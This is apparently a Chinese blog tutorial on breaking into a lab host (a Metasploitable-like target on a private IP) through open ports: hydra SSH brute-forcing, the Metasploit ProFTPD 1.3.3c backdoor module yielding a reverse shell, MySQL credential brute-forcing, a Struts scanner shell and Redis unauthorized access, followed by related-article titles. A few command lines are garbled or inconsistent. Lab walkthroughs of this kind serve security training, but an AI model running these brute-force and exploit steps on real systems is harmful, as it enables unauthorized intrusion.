常见的端口漏洞入侵主机
端口漏洞利用
当我们渗透一个网站时发现从网站渗透不进去的时候,就可以查看该网站主机开启了哪些端口,来从其开启的端口来进行入侵
一旦端口开放的话就可以从外部访问,操作系统都有或多或少的漏洞,特殊的请求或者指令触发之后就可以提升权限
实验环境
同一网段的两台主机:
入侵主机:kali
目标主机ip:192.168.31.69
使用kali和它本身自带的一些工具对受害主机进行入侵
先利用nmap对受害主机进行扫描查看其开启了哪些端口和服务
访问该ip发现80端口是一个phpinfo页面,无法利用80端口入侵
所以我们开始尝试从其他端口入侵该主机
22端口漏洞利用
发现其开启了22端口,22端口是SSH远程登录协议。最有可能利用的是弱口令的入侵。
使用kali自带hydra来进行暴力破解22端口
暴力破解ssh命令:
hydra -L /root/桌面/username.txt -P /root/桌面/password.txt -vV -o ssh.log -e ns -f 192.168.31.69 ssh
参数详解:
-L //暴力破解用户名字典
-P //暴力破解密码字典
-o ssh.log //输出到这个文件里
-vV //显示过程
-f //搜到账号密码就停止
经过一段时间的等待发现功夫不负有心人,还真破解出了22端口的登录账号密码
然后我们就可以使用破解出来的账号密码成功利用22端口远程登录主机并且发现是root权限
21端口漏洞利用
通过nmap扫描知道21端口开启的ftp版本是ProFTPD 1.3.3c,百度发现ProFTPD 1.3.3c有个后门命令执行漏洞
启动msfconsole
搜索ProFTPD 1.3.3c查看其漏洞模块
search ProFTPD 1.3.3c
切换到该漏洞模块下,并设置好目标ip
use exploit/unix/ftp/proftpd_133c_backdoorset RHOSTS 192.168.31.69run
成功反弹shell会话
3306端口漏洞利用
发现该主机还开启了3306端口,那么我们如何利用3306端口入侵目标主机呢?
3306端口是MySQL的默认端口,入侵者可以通过入侵3306端口来入侵我们的主机,在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库
启动msfconsole
扫描mysql模块
msf5 > search mysql
选择MySQL可用模块,在模块中选择渗透工具模块进行攻击
这里我们切换到mysql扫描模块,设置模块有效选项
msf5 > use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.31.69 #设置目标ip
txt5 auxiliary(scanner/mysql/mysql_login) > set USER_FILE /root/桌面/username.txt #设置用户名字典
txt5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/桌面/password.txt #设置密码字典
msf5 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true #破解成功时停止
msf5 auxiliary(scanner/mysql/mysql_login) >run #开始爆破
成功爆破出MySQL用户名密码
利用爆破出的账号密码成功登录MySQL数据库
8080端口入侵
发现8080端口有一个网站Struts,百度发现Struts可以使用Struts Scan工具获得指定漏洞交互式shell
下载Struts Scan解压,并切换到struts-scan-master目录下
执行root@kali:~/桌面/struts-scan-master# python struts-scan.py
出现如下界面则安装成功
使用给出的指定漏洞交互shell执行payload
成功获得交互式shell
6379端口漏洞入侵
该主机还开启了6379端口,发现6379端口可以利用Redis未授权访问漏洞来入侵
在本地下载Redis并解压安装
wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar xzf redis-4.0.8.tar.gz
cd redis-3.2.0
make
修改配置文件,使可以远程访问
在bind 127.0.0.1前面加上#将其注释掉
把protected-mode后面的yes设为no
启动redis-server
./src/redis-server redis.conf
如果报错执行下列命令
cd /root/redis-4.0.8/src
然后连接redis发现成功连接
常见的端口漏洞入侵主机相关推荐
- 利用samba漏洞入侵linux主机(samba低版本漏洞利用)
复现samba漏洞入侵linux主机(samba低版本漏洞利用) Samba是在Linux和UNIX系统上实现,由服务器及客户端程序构成.SMB(Server Messages Block,信息服务块 ...
- 常见端口漏洞利用总结
21端口渗透剖析 FTP通常用作对远程服务器进行管理,典型应用就是对web系统进行管理.一旦FTP密码泄露就直接威胁web系统安全,甚至黑客通过提权可以直接控制服务器.这里剖析渗透FTP服务器的几种方 ...
- 运维常见服务安全漏洞修复建议
文章目录 常见运维漏洞 漏洞☞ Zabbix zabbix漏洞的危害 漏洞☞ Rsync (配置不当引发的问题) rsync 介绍 配置参数介绍 漏洞扫描 简易版本rsync脚本扫描 修复建议 漏洞☞ ...
- 【内网安全】135端口的入侵与防御
一.135端口 135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利 ...
- 黑客常用端口漏洞利用
文章目录 21端口渗透剖析 22端口渗透剖析 23端口渗透剖析 25/465端口渗透剖析 53端口渗透剖析 80端口渗透剖析 135端口渗透剖析 139/445端口渗透剖析 1433端口渗透剖析 15 ...
- kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7
kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...
- 网络空间搜索引擎及常用的端口漏洞
网络空间搜索引擎 一.什么是网络空间搜索引擎 网络空间搜索引擎不同于普通的搜索引擎(百度等之类的),而是直接搜索网络中的主机,将主机信息汇聚成数据库,然后显示出主机的IP.端口.中间件.摄像头.工控设 ...
- 常见的端口号以及协议
常见的端口号以及协议 从平常最小的渗透测试到我们熟知的大型红蓝对抗.攻防演练还有HVV,最重要同样也是最可能被忽略的一部分就是对常见端口以及协议的信息收集,我们对一些常见的端口号都能快速讲出来,而对于 ...
- 多方面看IP地址与常见的端口号~华山论剑
一,看看何为IP地址与端口号 (1)IP地址就相当于我们的家(网络定义),分为ipv4和ipv6,我们所说的的IP地址指的是IPV4的地址.家的入口可以看作端口号,从前门进还是后门进啊: 而各个网络在 ...
最新文章
- python读取csv文件的方法-python读取csv文件指定行的2种方法详解
- 【Linux】39.nslookup查看域名与其对应的ip
- access超过255列数据_Access的数据类型,与Excel虽类似,数据库+sql更适合大量数据管理...
- Effective C++ 重要条款
- 如何双启动Linux和Windows
- 前端跳转页面 添加request headers_前端需要了解的 CORS 知识
- PHP 判断客户端请求是 Android 还是 IOS
- Python3爬虫数据入数据库---把爬取到的数据存到数据库,带数据库去重功能
- bisect algorithm(python 的标准库函数 bisect model)
- 初识IOS,Label控件的应用。
- 【java】序列化反序列化
- SetTimer函数总结
- 矢量网络分析仪--测天线时使用技巧
- Python练习:炉石传说荣誉室返尘最优策略
- omf多路径 oracle_Oracle OMF 功能详解
- Java实现菱形图案
- 剪不断,理还乱--Oracle的字符集乱码问题
- Prism4学习笔记(七):State-Based Navigation QuickStart
- 细说内网横向工具WMIHACK
- C语言经典面试笔试题